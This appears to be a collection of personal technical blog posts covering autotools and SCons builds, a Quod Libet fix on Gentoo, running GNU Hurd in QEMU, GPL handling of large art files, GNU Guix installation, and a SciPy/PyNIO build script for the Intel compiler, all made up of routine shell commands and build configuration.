And then I used the created variables in the Makefile.am: See the @-characters around the program names.

pdf_DATA = sink.pdf doktorarbeit.pdf

sink = sink.tex
pkgdata_DATA = images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png
dist_pkgdata_DATA = images/bona-marble.png images/boas-marble.png

plotdir = .
dist_plot_DATA = nee-comp.pyx nee-comp.txt

doktorarbeit = doktorarbeit.org

EXTRA_DIST = ${sink} ${dist_pkgdata_DATA} ${doktorarbeit}

MOSTLYCLEANFILES = \#* *~ *.bak # kill editor backups
CLEANFILES = ${pdf_DATA}
DISTCLEANFILES = ${pkgdata_DATA}

sink.pdf : ${sink} ${pkgdata_DATA} ${dist_pkgdata_DATA}
    TEXINPUTS=${TEXINPUTS}:$(srcdir)/:$(srcdir)/images// @pdflatex@ $<
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

${pkgdata_DATA} : ${dist_plot_DATA}
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then cp -u "$(i)" "$(notdir $(i))"; fi;)
    ${MKDIR_P} images
    @pyxplot@ $<
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then rm -f "$(notdir $(i))"; fi;)

doktorarbeit.pdf : ${doktorarbeit}
    if test "$<" != "$(notdir $<)"; then cp -u "$<" "$(notdir $<)"; fi
    @emacs@ --batch --visit "$(notdir $<)" --funcall org-export-as-pdf
    if test "$<" != "$(notdir $<)"; then rm -f "$(notdir $<)"; rm -f $(basename $(notdir $<)).tex $(basename $(notdir $<)).tex~; else rm -f $(basename $<).tex $(basename $<).tex~; fi  
Third milestone reached: Checking for required tools!

Summary

With this I’m at the limit of the advantages of autotools for my simple project.

They allow me to create and check a distribution tarball with relative ease (if I know how to do it), and I can use them to check for tools - and to specify alternative tools via the commandline.

For a C or C++ project, autotools would have given me a lot of other things for free, but even the basic features shown here can be useful.

You have to judge for yourself if they outweight the cost of moving away from the dead simple Makefile syntax.

Comparing SCons

A little bonus I want to share.

I also wrote an scons script as alternative to my Makefile which I think might be interesting to you. It is almost equivalent to my Makefile since it can build my files, but scons does not match the features of the full autotools build and distribution system. Missing: Clean up temporary files and create a validated distribution tarball.

Missing in SCons: No distcheck!

You might notice that the more declarative style with explicit dependency information looks quite a bit more similar to automake than to plain Makefiles.

The following is my SConstruct file:

#!/usr/bin/env python
## I need a couple of special builders for my projects
# the $SOURCE replacement only uses the first source file. $SOURCES gives all.
# specifying all source files makes it possible to rerun the build if a single source file changed.
orgexportpdf = 'emacs --batch --visit "$SOURCE" --funcall org-export-as-pdf'
pyxplot = 'pyxplot $SOURCE'
# pdflatex is quite dirty. I directly clean up after it with rm.
pdflatex = 'pdflatex $SOURCE -o $TARGET; rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb'

# build the PhD thesis from emacs org-mode.
Command("doktorarbeit.pdf", "doktorarbeit.org",
        orgexportpdf)

# create plots
Command(["images/comp-t3-s07-tem-boas.png", 
         "images/comp-t3-s07-tem-bona.png"], 
        ["nee-comp.pyx", 
         "nee-comp.txt"],
        pyxplot)

# build my sink.pdf
Command("sink.pdf", 
        ["sink.tex", 
         "images/comp-t3-s07-tem-boas.png", 
         "images/comp-t3-s07-tem-bona.png", 
         "images/bona-marble.png", 
         "images/boas-marble.png"],
        pdflatex)

# My editors leave tempfiles around. I want them gone after a build clean. This is not yet supported!
tempfiles = Glob('*~') + Glob('#*#') + Glob('*.bak')
# using this here would run the cleaning on every run.
#Command("clean", [], Delete(tempfiles))

If you want to integrate building with scons into a Makefile, the following lines allow you to run scons with `make sconsrun`. You might have to also mark sconsrun as .PHONY.

sconsrun : scons
    python scons/bootstrap.py -Q

scons : 
    hg clone https://bitbucket.org/ArneBab/scons

Here you can see part of the beauty of autotools, because you can just add this to your Makefile.am instead of the Makefile and it will work inside the full autotools project (though without the dist-integration). So autotools is a real superset of simple Makefiles.

Notes

If org-mode export keeps pestering you about selecting a TeX-master everytime you build the PDF, add the following to your org-mode file:

#+BEGIN_LaTeX
%%% Local Variables:
%%% TeX-master: t
%%% End:
#+END_LaTeX
AnhangGröße
2013-03-05-Di-make-to-autotools.org12.9 KB

How to fix a bug, using the example of Quod Libet empty panes on Gentoo GNU/Linux (bug solving process)

PDF-version (for printing)

orgmode-version (for editing)

For a few days now my Quod Libet has been broken, showing only empty space instead of information panes.

2013-12-11-quod-libet-broken.png

I investigated halfheartedly, but did not find the cause with quick googling. Today I decided to change that. I document my path here, because I did not yet write about how I actually tackle problems like these - and I think I would have profited from having a writeup like this when I started, instead of having to learn it by trial-and-error.

Update: Quodlibet 2.6.3 is now in the Gentoo portage tree - using my ebuild. The update works seamlessly. So to get your Quodlibet 2.5 running again, just call emerge =media-sound/quodlibet-2.6.3 =media-plugins/quodlibet-plugins-2.6.3. Happy Hacking!

Update: I got a second reply in the bug tracker which solved the plugins problem: I had user-plugins which require Quod Libet 3. Solution: mv ~/.quodlibet/plugins ~/.quodlibet/plugins.for-ql3. Quod Libet works completely again.

Solution for the impatient: Update to Quod Libet 2.5.1. In Gentoo that’s easy.

1 Gathering Information

As starting point I installed the Quod Libet plugins (media-libs/quodlibet-plugins), thinking that the separation between plugins and mediaplayer might not be perfect. That did not fix the problem, but a look at the plugin listing gave me nice backtraces:

2013-12-11-quod-libet-broken-plugins.png

And these actually show the reason for the breakage: Cannot import GTK:

Traceback (most recent call last):
  File "/home/arne/.quodlibet/plugins/songsmenu/albumart.py", line 51, in <module>
    from gi.repository import Gtk, Pango, GLib, Gdk, GdkPixbuf
  File "/usr/lib64/python2.7/site-packages/gi/__init__.py", line 27, in <module>
    from ._gi import _API, Repository
ImportError: cannot import name _API

Let’s look which package this file belongs to:

equery belongs /usr/lib64/python2.7/site-packages/gi/__init__.py
 * Searching for /usr/lib64/python2.7/site-packages/gi/__init__.py ... 
dev-python/pygobject-3.8.3 (/usr/lib64/python2.7/site-packages/gi/__init__.py)

So I finally have an answer: pygobject changed the API. Can’t be hard to fix… (a realization process follows)

2 The solution-hunting process

  • let’s check the Gentoo forums for pygobject
  • pygobject now pulls systemd??? - and they wonder why I’m pissed off by systemd: hugely invasive changes just for some small packages… KDE gets rid of the monolithic approach, and now Gnome starts it, just much more invasive into the basic structure of all distros?
  • set the USE flag -systemd to avoid systemd (why didn’t I have that yet? I guess I did not expect that Gentoo would push that on me…)
  • check when I updated pygobject:
qlop -l pygobject
...
Thu Dec  5 00:26:27 2013 >>> dev-python/pygobject-3.8.3
  • a week ago - that fits the timeframe. Damn… pygobject-3.8.3, you have to go.
echo =dev-python/pygobject-3.8.3 >> /usr/portage/package.mask
emerge -u pygobject
  • hm, no, the backtrace was for the plugin, but when I start Quod Libet from the shell, I see this:
LANG=C quodlibet
/usr/lib64/python2.7/site-packages/quodlibet/qltk/songlist.py:44: GtkWarning: Unable to locate theme engine in module_path: "clearlooks",
  _label = gtk.Label().create_pango_layout("")
  • emerge x11-themes/clearlooks-phenix to get clearlooks again. Looks nicer now, but still not fixed.

2013-12-11-quod-libet-broken-clearlooks.png

  • back to the drawing board. Let’s tackle this pygobject thing: emerge -C =dev-python/pygobject-3.8.3/, emerge -1 =dev-python/pygobject-2.28.6-r55.
  • not fixed. OK… let’s report a bug: empty information panes (screenshots attached).

3 The core solution

In the bug report at Quod Libet I got a reply: Known issue with quodlibet 2.5 “which triggered a bug in a recent pygtk release, resulting in lists not showing”. The plugins seem to be unrelated. Solution to my immediate problem: Update to 2.5.1. That’s not yet in gentoo, but this is easy to fix:

cd /usr/portage/media-sound/
# create the category in my local portage overlay, defined as
# PORTAGE_OVERLAY=/usr/local/portage in /etc/make.conf
mkdir -p /usr/local/portage/media-sound
# copy over the quodlibet directory, keeping the permissiong with -p
cp -rp quodlibet /usr/local/portage/media-sound
# most times it is enough to simply rename the ebuild to the new version
cd /usr/local/portage/media-sound/quodlibet
mv quodlibet-2.5.ebuild quodlibet-2.5.1.ebuild
# now prepare all the metadata portage needs - this requires
# app-portage/gentoolkit
ebuild quodlibet-2.5.1.ebuild digest compile 
# now it's prepared for the package manager. Just update it as usual:
emerge -u quodlibet

I wrote the solution in the Gentoo bug report. I should also state, that the gentoo package for Quod Libet is generally out of date (releases 2.6.3 and 3.0.2 are not yet in the tree).

Quod Libet works again.

2013-12-11-quod-libet-fixed.png

As soon as the ebuild in the portage tree is renamed, Quod Libet should work again for all Gentoo users.

The plugins still need to be fixed, but I’ll worry about that later.

4 Conclusion

Solving the core problem took me some time, but it wasn’t really complicated. The part of the solution process which got me forward boils down to:

  • checking the project bug tracker,
  • checking the distribution bug tracker,
  • reporting a bug for the project with the information I could gather - including screenshots (or anything else which shows the problem directly - see How to Report Bugs Effectively for hints on that), and
  • checking the reported bug again a few hours or days later - and synchronizing the information between the project bug tracker and the distribution bug tracker to help fixing the bug for all users of the distribution and of other distributions.

And that’s it: To get something working again, check the bug trackers, report bugs and help synchronizing bug tracker info.

AnhangGröße
2013-12-11-quod-libet-broken.png49.59 KB
2013-12-11-quod-libet-broken-clearlooks.png50.44 KB
2013-12-11-quod-libet-broken-plugins.png27.47 KB
2013-12-11-quod-libet-fixed.png85.61 KB
2013-12-11-Mi-quodlibet-broken.org7.11 KB
2013-12-11-Mi-quodlibet-broken.pdf419.37 KB

How to run your own GNU Hurd (in 140 letters)

Don’t want to rely on other’s opinions about the Hurd? How to run your own GNU Hurd, in 140 letters:

wget http://people.debian.org/~sthibault/hurd-i386/debian-hurd.img.tar.gz; tar xf de*hu*gz; qemu-system-x86_64 -hda de*hu*g -m 1G

This is the GNU Hurd

For additional convenience and performance, setup ssh access and enable kvm:

wget http://people.debian.org/~sthibault/hurd-i386/debian-hurd.img.tar.gz; tar xf de*hu*gz; qemu-system-x86_64 -enable-kvm -net user,hostfwd=tcp:127.0.0.1:2222-:22 -net nic -m 1G -drive cache=writeback,file=$(ls de*hu*g)

⇒ login: root, no pw needed. Set a password for user demo:

passwd demo

⇒ log into your Hurd via ssh:

ssh demo@localhost -p 2222

That’s it: You run the Hurd. You you would want to do that? See cat translator_intro — and much more.

Additional information:

Run your own GNU Hurd

AnhangGröße
2016-06-08-hurd-howto-140-combined.xcf119.56 KB
2016-06-08-hurd-howto-140-combined.png19.92 KB
hurd-test-2017.webm1.05 MB

Huge datafiles in free culture projects under GPL

4 ways how large raw artwork files are treated in free culture projects to provide the editable source.1

In the discussion about license compatibility of the creativecommons sharealike license towards the GPL, Anthony asked how the source-requirement is solved for artwork which often has huge raw files. These are the 4 basic ways I described in my answer.

1. The Wesnoth Way

“The Source is what we have”

The project just asks artists for full resolution PNG image files (without all the layering information) - and only uses these to develop the art. This was spearheaded by the GPL-licensed strategy game Battle for Wesnoth.

This is a viable strategy and also allows developing art, though a bit less convenient than with the layered sources. For example the illustrator who created many of the images in the RPG I work on used our PNG instead of her photoshop file to extract a die from the cover she created for us. She took the chance to also touch up the colors a bit - she had learned some new tricks to improve her paintings.

This clearly complies with the GPL, because the GPL just requires providing the file used for editing published file. If the released file is what you actually use to change published files, then the published file is the source.

2. The External Storage

“Use the FTP, Luke”

Here, files which are too big to be versioned effectively or which most people don’t need when working with the project get version-numbers and are put into an external storage - like an FTP server.

I do that for gimp-files: I put these into our public release-listing via FTP. For example I used that for a multi-layer cover which gets baked into our PDF.

3. The Elegant Way

“Make it so!”

Here huge files are simply versioned alongside other files and the versions to be used are created directly from the multi-layered files. The usual way to do that is a Makefile in which scripts explicitly define how the derived file can be extracted.

This is most elegant, because it has no duplication of information, the source is always trivial to find, it’s always clear that the derived file really originated from the source and it is easy to avoid quality loss or even reduce it later.

The disadvantage is that it can be very cumbersome to force new developers to get all huge files and then create them before being able to really start developing.

The common way to do this is a Makefile - for example the one I use for building my PhD thesis.

4. Pragmatic Elegance

“Hybrids win”

All the ways above can be combined: Huge files are put in version control, but the derived files are included, too, to make it easier for new people to get in. Maybe the huge files are only included on request - for example they could be stubs with which the version control system can retrieve the full files when the user wants them. This can partially be done with the largefiles extension in Mercurial by just not getting the large files.

Also you can just keep separate raw files and derived files. This is also used in Battle for Wesnoth: Optimized files of the right size for the game are stored in one folder while the bigger full resolution files are stored separately.

If you want to include free art in a GPL-covered work, I hope this article gave you some inspiration!


  1. The die was created by Trudy Wenzel (2013) and is licensed under GPLv3 or later. 

Immutable function arguments and variables

  1. Dev A: “Fortran is totally outdated.”
  2. Dev B: “I wish we could declare objects in function arguments or variable values as immutable in Java and Javascript.”

Fortran developer silently weeps:

! immutable 2D array as argument in Fortran
  integer, intent(in) :: arg(:,:)
! constant value
  character(len=10), parameter :: numbers = "0123456789"

See parameter vs. intent(in).

(yes, I’m currently reading a Javascript book)

If you now want to see more of Fortran:

Installing GNU Guix 0.6, easily

Org-Source (for editing)

PDF (for printing)

“Got a power-outage while updating?
No problem: Everything still works”

GNU Guix is the new functional package manager from the GNU Project which complements the Nix-Store with a nice Guile Scheme based package definition format.

What sold it to me was “Got a power-outage while updating? No problem: Everything still works” from the Guix talk of Ludovico at the GNU Hacker Meeting 2013. My son once found the on-off-button of our power-connector while I was updating my Gentoo box. It took me 3 evenings to get it completely functional again. This would not have happened with Guix.

Update (2014-05-17): Thanks to zerwas from IRC @ freenode for the patch to guix 0.6 and nice cleanup!

Intro

Installation of GNU Guix is straightforward, except if you follow the docs, but it’s not as if we’re not used to that from other GNU utilities, which often terribly short-sell their quality with overly general documentation ☺

So I want to provide a short guide how to setup and run GNU Guix with ease. My system natively runs Gentoo, My system natively runs Gentoo, so some details might vary for you. If you use Gentoo, you can simply copy the commands here into the shell, but better copy them to a text-file first to ensure that I do not try to trick you into doing evil things with the root access you need.

In short: This guide provides the First Contact and Black Triangle for GNU Guix.

Getting GNU Guix

mkdir guix && cd guix
wget http://alpha.gnu.org/gnu/guix/guix-0.6.tar.gz
wget http://alpha.gnu.org/gnu/guix/guix-0.6.tar.gz.sig
gpg --verify guix-0.?.tar.gz.sig

Installing GNU Guix

tar xf guix-0.?.tar.gz
cd guix-0.?
./configure && make -j16
sudo make install

Setting up GNU Guix

Build users

Build-users allow for strong separation of build processes: They cannot affect each other, because they actually run as different users.

sudo screen
groupadd guix-builder
for i in `seq 1 10`;
  do
    useradd -g guix-builder -G guix-builder           \
            -d /var/empty -s `which nologin`          \
            -c "Guix build user $i" --system          \
            guix-builder$i;
  done
exit

(if you do not have GNU screen yet, you should get it. It makes working on remote servers enjoyable.

Add user work folder.

Also we want to run guix as regular user. We need to pre-create the user-specific build-directory. Note: This should really be done automatically.

sudo mkdir -p /usr/local/var/nix/profiles/per-user/$USER
sudo chown -R $USER:$USER /usr/local/var/nix/profiles/per-user/$USER

Fix store permissions

chgrp 1002 /nix/store; chmod 1775 /nix/store

Starting the guix daemon and making it launch at startup

this might be quite Gentoo-specific.

sudo screen
echo "#\!/bin/sh" >> /etc/local.d/guix-daemon.start
echo "guix-daemon --build-users-group=guix-builder &" >> /etc/local.d/guix-daemon.start
echo "#\!/bin/sh" >> /etc/local.d/guix-daemon.stop
echo "pkill guix-daemon" >> /etc/local.d/guix-daemon.stop
chmod +x /etc/local.d/guix-daemon.start
chmod +x /etc/local.d/guix-daemon.stop
exit

(the pkill is not the nice way of killing the daemon. Ideally the daemon should have a –kill option)

To avoid having to restart, we just launch the daemon once, now.

sudo /etc/local.d/guix-daemon.start

Adding the guix-installed programs to your PATH

Guix installs each state of the system in its own directory, which actually enables rollbacks. The current state is made available via ~/.guix-profile/, and so we need ~/.guix-profile/bin in our path:

echo "export PATH=$PATH:~/.guix-profile/bin" >> ~/.bashrc
. ~/.bashrc

Using guix

Guix comes with a quite complete commandline interface. The basics are

  • Update the package listing: guix pull
  • List available packages: guix package -A
  • Install a package: guix package -i PACKAGE
  • Update all packages: guix package -u

Experience

For a new distribution-tool, Guix is quite nice. Remember, though, that it builds on Nix: It is not a complete reinvention but rather “stands on the shoulders of giants”.

The download speeds are abysmal, though. http://hydra.gnu.org seems to have a horribly slow internet connection…

And what I direly missed is a short command explanation in the help output:

$ guix --help
Usage: guix COMMAND ARGS...
Run COMMAND with ARGS.

COMMAND must be one of the sub-commands listed below:

   build
   download
   gc
   hash
   import
   package
   pull
   refresh
   substitute-binary

Also I miss the categories I know from Gentoo: Having package-names like grue-hunter seems very unorganized compared to the games-text/grue-hunter which I know from Gentoo.

And it would be nice to have shorthands for the command names:

  • "guix pa -i" instead of "guix package -i" (though there is a namespace clash with guix pull :( )
  • "guix pu" for "guix pull"

and so on.

But anyway: A very interesting project which I plan to keep tracking. It might allow me to do less risky local package installs of stuff I need, like small utilities I wrote myself.

The big advantage of that would be, that I could actually take them with me when I have to use different distros (though I’ve been a happy Gentoo user for ~10 years and I don’t see it as likely that I’ll switch completely: Guix would have to include all the roughly 30k packages in Gentoo to actually be a full-fledged alternative - and provide USE flags and all the convenient configurability which makes Gentoo such a nice experience).

Using guix for such small stuff would allow me to decouple experiments from my production environment (which has to keep working).

But enough talk: Have fun with GNU Guix and Happy Hacking!

Author: Arne Babenhauserheide

Created: 2014-05-17 Sa 23:40

Emacs 24.3.1 (Org mode 8.2.5h)

Validate

AnhangGröße
2013-09-04-Mi-guix-install.org6.53 KB
2013-09-04-Mi-guix-install.pdf171.32 KB

Installing Scipy and PyNIO on a Bare Cluster with the Intel Compiler

2 years ago I had the task of running a python-program using scipy on our university cluster, using the Intel Compiler. I needed all those (as well as PyNIO and some other stuff) for running TM5 with the python shell on the HC3 of KIT.

This proved to be quite a bit more challenging than I had expected - but it was very interesting, too (and there I learned the basics of GNU autotools which still help me a lot).

But no one should have to go to the same effort with as little guidance as I had, so I decided to publish the script and the patches I created for installing everything we needed.1

The script worked 2 years ago, so you might have to fix some bits. I won’t promise that this contains everything you need to run the script - or that it won’t be broken when you install it. Actually I won’t promise anything at all, except that if the stuff here had been available 2 years ago, that could have saved me about 2 months of time (each of the patches here required quite some tracking of problems, experimenting and fixing, until it provided basic functionality - but actually I enjoyed doing that - I learned a lot - I just don’t want to be forced to do it again). Still, this stuff contains quite some hacks - even a few ugly ones. But it worked.

2 libraries and programs which get installed (=requirements)

This script requires and installs quite a few libraries. I retrieved most of the following tarballs from my Gentoo distfiles dir after installing the programs locally. I uploaded them to draketo.de/dateien/scipy-pynio-deps. These files are included there:

satexputils.so also needs interpolatelevels.F90 which I think that I am not allowed to share, so you’re on your own there. Guess why I do not like using non-free (or not-guaranteed-to-be-free) software.

3 Known Bugs

3.1 HDF autotools patch throws away some CFLAGS

The hdf autotools patch only retrieves the last CFLAG instead of all:

export CC='gcc-4.8.1 -Wall -Werror'                                                          
echo $CC | grep \ - | sed 's/.* -/-/'                                                                     
-Werror

If you have the regexp-foo to fix that, please improve the patch! But without perl (otherwise we’d have to install perl, too).

3.2 SciPy inline-C via weaver does not work

Udo Grabowski, the maintainer of our institutes sun-cluster somehow managed to get that working on OpenIndiana with the Sun-Compiler, but since I did not need it, I did not dig deeper to see whether I could adapt his solutions to the intel-compiler.

5 Implementation

This is the full install script I used to install all necessary dependencies.

#!/bin/bash

# Untar

for i in *.tar* *.tgz; do
  tar xvf $i || exit
done

# Install

PREFIX=/home/ws/babenhau/
PYPREFIX=/home/ws/babenhau/python/

# Blas

cd BLAS
cp ../blas-make.inc make.inc || exit
#make -j9 clean
F77=ifort make -j9 || exit
#make -j9 install --prefix=$PREFIX
# OR for Intel compiler:
ifort -fPIC -FI -w90 -w95 -cm -O3 -xHost -unroll -c *.f || exit
#Continue below irrespective of compiler:
ar r libfblas.a *.o || exit
ranlib libfblas.a || exit
cd ..
ln -s BLAS blas

## Lapack

cd lapack-3.3.1
ln -s ../blas
# this has a hardcoded absolute path to blas in it: replace is with the appropriate one for you.
cp ../lapack-make.inc make.inc || exit
make -j9 clean  || exit
make -j9
make -j9 || exit
cp lapack_LINUX.a libflapack.a || exit
#make -j9 install --prefix=$PREFIX
cd ..

# C interface

patch -p0 < lapacke-ifort.diff

cd lapacke
# patch for lapack 3.3.1 and blas
for i in gnu inc intel ; do 
    sed -i s/lapack-3\.2\.1\\/lapack\.a/lapack-3\.3\.1\\/lapack_LINUX.a/ make.$i; 
    sed -i s/lapack-3\.2\.1\\/blas\.a/blas\\/blas_LINUX.a/ make.$i; 
done

make -j9 clean || exit
#make -j9
LINKER=ifort LDFLAGS=-nofor-main make -j9 # || exit
#LINKER=ifort LDFLAGS=-nofor-main make -j9 install
cd ..

## ATLAS

cd ATLAS
cp ../Make.Linux_HC3 . || exit
echo "ATLAS needs manual intervention. Run make by hand first."
#echo "just say yes. It makes some stuff we need later."
#make
#mv bin/Linux_UNKNOWNSSE2_8 bin/Linux_HC3
#for i in bin/Linux_HC3/*; do sed -i s/UNKNOWNSSE2_8/HC3/ $i ; done
#rm bin/Linux_HC3/Make.inc
#cd bin/Linux_HC3/
#ln -s ../../Make.Linux_HC3 Make.inc
#cd -

make -j9 install arch=Linux_HC3 || exit
cd lib
for i in Linux_HC3/* ; do ln -s $i ; done
cd ../bin
for i in Linux_HC3/* ; do ln -s $i ; done
cd ../include
for i in Linux_HC3/* ; do ln -s $i ; done
cd ..
cd ..

# Numpy and SciPy with intel compilers

# Read this: http://marklodato.github.com/2009/08/30/numpy-scipy-and-intel.html

# patching

patch -p0 < SuiteSparse.diff  || exit
patch -p0 < SuiteSparse-umfpack.diff  || exit

rm numpy
ln -s numpy-*.*.*/ numpy
patch -p0 < numpy-icc.diff  || exit
patch -p0 < numpy-icpc.diff || exit
patch -p0 <<EOF
--- numpy/numpy/distutils/fcompiler/intel.py      2009-03-29 07:24:21.000000000 -0400
+++ numpy/numpy/distutils/fcompiler/intel.py  2009-08-06 23:08:59.000000000 -0400
@@ -47,6 +47,7 @@
     module_include_switch = '-I'

     def get_flags(self):
+        return ['-fPIC', '-cm']
         v = self.get_version()
         if v >= '10.0':
             # Use -fPIC instead of -KPIC.
@@ -63,6 +64,7 @@
         return ['-O3','-unroll']

     def get_flags_arch(self):
+        return ['-xHost']
         v = self.get_version()
         opt = []
         if cpu.has_fdiv_bug():
EOF
# include -fPIC in the fcompiler.
sed -i "s/w90/w90\", \"-fPIC/" numpy/numpy/distutils/fcompiler/intel.py
# and more of that
patch -p0 < numpy-ifort.diff

rm scipy
ln -s scipy-*.*.*/ scipy

patch -p0 < scipy-qhull-icc.diff || exit
patch -p0 < scipy-qhull-icc2.diff || exit

# # unnecessary!
# patch -p0 <<EOF
# --- scipy/scipy/special/cephes/const.c    2009-08-07 01:56:43.000000000 -0400
# +++ scipy/scipy/special/cephes/const.c        2009-08-07 01:57:08.000000000 -0400
# @@ -91,12 +91,12 @@
# double THPIO4 =  2.35619449019234492885;       /* 3*pi/4 */
# double TWOOPI =  6.36619772367581343075535E-1; /* 2/pi */
# #ifdef INFINITIES
# -double INFINITY = 1.0/0.0;  /* 99e999; */
# +double INFINITY = __builtin_inff();
# #else
# double INFINITY =  1.79769313486231570815E308;    /* 2**1024*(1-MACHEP) */
# #endif
# #ifdef NANS
# -double NAN = 1.0/0.0 - 1.0/0.0;
# +double NAN = __builtin_nanf("");
# #else
# double NAN = 0.0;
# #endif
# EOF


# building

# TODO: try again later

cd SuiteSparse

make -j9 -C AMD || exit
make -j9 -C UMFPACK || exit

cd ..

# TODO: build numpy again and make sure it has blas and lapack (and ATLAS?)

cd numpy
python setup.py -v build_src config --compiler=intel build_clib \
    --compiler=intel build_ext --compiler=intel || exit
python setup.py install --prefix=$PYPREFIX || exit
cd ..

# scons and numscons
cd scons-2.0.1
python setup.py -v install --prefix=/home/ws/babenhau/python/ || exit
cd ..

git clone git://github.com/cournape/numscons.git
cd numscons 
python setup.py -v install --prefix=/home/ws/babenhau/python/  || exit
cd ..

# adapt /home/ws/babenhau/python/lib/python2.7/site-packages/numpy/distutils/fcompiler/intel.py by hand to include fPIC for intelem

cd scipy

PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py -v config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../SuiteSparse/UFconfig # no exit, because we do the linking by hand later on.

# one file is C++ :(
icpc -fPIC -I/home/ws/babenhau/python/include/python2.7 -I/home/ws/babenhau/python/lib/python2.7/site-packages/numpy/core/include -I/home/ws/babenhau/python/lib/python2.7/site-packages/numpy/core/include -c scipy/spatial/qhull/src/user.c -o build/temp.linux-x86_64-2.7/scipy/spatial/qhull/src/user.o || exit

# linking by hand

# for x in csr csc coo bsr dia; do
#    icpc -xHost -O3 -fPIC -shared \
#        build/temp.linux-x86_64-2.7/scipy/sparse/sparsetools/${x}_wrap.o \
#        -o build/lib.linux-x86_64-2.7/scipy/sparse/sparsetools/_${x}.so || exit
# done
#icpc -xHost -O3 -fPIC -openmp -shared \
#   build/temp.linux-x86_64-2.7/scipy/interpolate/src/_interpolate.o \
#   -o build/lib.linux-x86_64-2.7/scipy/interpolate/_interpolate.so || exit

# build again with the C++ file already compiled

PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../SuiteSparse/UFconfig || exit

# make sure we have cephes
cd scipy/special
PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../../../ATLAS/ \
    LAPACK=../../../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../../../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py -v config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../../../SuiteSparse/UFconfig
cd ../..

# install
PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem install --prefix=$PYPREFIX || exit

cd ..

# PyNIO

# netcdf-4

patch -p0 < netcdf-patch1.diff || exit
patch -p0 < netcdf-patch2.diff || exit

cd netcdf-4.1.3

CPPFLAGS="-I/home/ws/babenhau/libbutz/hdf5-1.8.7/include -I/home/ws/babenhau/include" LDFLAGS="-L/home/ws/babenhau/libbutz/hdf5-1.8.7/lib/ -L/home/ws/babenhau/lib -lsz -L/home/ws/babenhau/libbutz/szip-2.1/lib -L/opt/intel/Compiler/11.1/080/lib/intel64/libifcore.a -lifcore" ./configure --prefix=/home/ws/babenhau/ --enable-netcdf-4 --enable-shared || exit

make -j9; make check install -j9 || exit

cd ..

# NetCDF4
cd netCDF4-0.9.7
HAS_SZIP=1 SZIP_PREFIX=/home/ws/babenhau/libbutz/szip-2.1/ HAS_HDF5=1 HDF5_DIR=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_PREFIX=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_includedir=/home/ws/babenhau/libbutz/hdf5-1.8.7/include HDF5_libdir=/home/ws/babenhau/libbutz/hdf5-1.8.7/lib HAS_NETCDF4=1 NETCDF4_PREFIX=/home/ws/babenhau/ python setup.py build_ext --compiler="intel" --fcompiler="intel -fPIC" install --prefix $PYPREFIX
cd ..

# parallel netcdf and hdf5: ~/libbutz/

patch -p0 < pynio-fix-no-grib.diff || exit

cd PyNIO-1.4.1
HAS_SZIP=1 SZIP_PREFIX=/home/ws/babenhau/libbutz/szip-2.1/ HAS_HDF5=1 HDF5_DIR=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_PREFIX=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_includedir=/home/ws/babenhau/libbutz/hdf5-1.8.7/include HDF5_libdir=/home/ws/babenhau/libbutz/hdf5-1.8.7/lib HAS_NETCDF4=1 NETCDF4_PREFIX=/home/ws/babenhau/ python setup.py install --prefix=$PYPREFIX || exit
# TODO: Make sure that the install goes to /home/ws/.., not home/ws/...
cd ..

# satexp_utils.so

f2py -c -m satexp_utils --f77exec=ifort --f90exec=ifort interpolate_levels.F90 || exit

## pyhdf

# recompile hdf with fPIC - grr!
cd hdf-4*/
# Fix configure for compilers with - in the name.
patch -p0 < ../hdf-fix-configure.ac.diff
autoconf
FFLAGS="-ip -O3 -xHost -fPIC -r8" CFLAGS="-ip -O3 -xHost -fPIC" CXXFLAGS="$CFLAGS -I/usr/include/rpc  -DBIG_LONGS -DSWAP" F77=ifort ./configure --prefix=/home/ws/babenhau/ --disable-netcdf --with-szlib=/home/ws/babenhau/libbutz/szip-2.1 # --with-zlib=/home/ws/babenhau/libbutz/zlib-1.2.5 --with-jpeg=/home/ws/babenhau/libbutz/jpeg-8c
# finds zlib and jpeg due to LD_LIBRARY_PATH (hack but works…)
make
make install
cd ..

# build pyhdf
cd pyhdf-0.8.3/
INCLUDE_DIRS="/home/ws/babenhau/include:/home/ws/babenhau/libbutz/szip-2.1/include" LIBRARY_DIRS="/home/ws/babenhau/lib:/home/ws/babenhau/libbutz/szip-2.1/lib" python setup.py build -c intel --fcompiler ifort install --prefix=/home/ws/babenhau/python 
cd ..

## matplotlib

cd matplotlib-1.1.0
patch -p0 < ../matplotlib-add-icc-support.diff
python setup.py build -c intel install --prefix=/home/ws/babenhau/python
cd ..

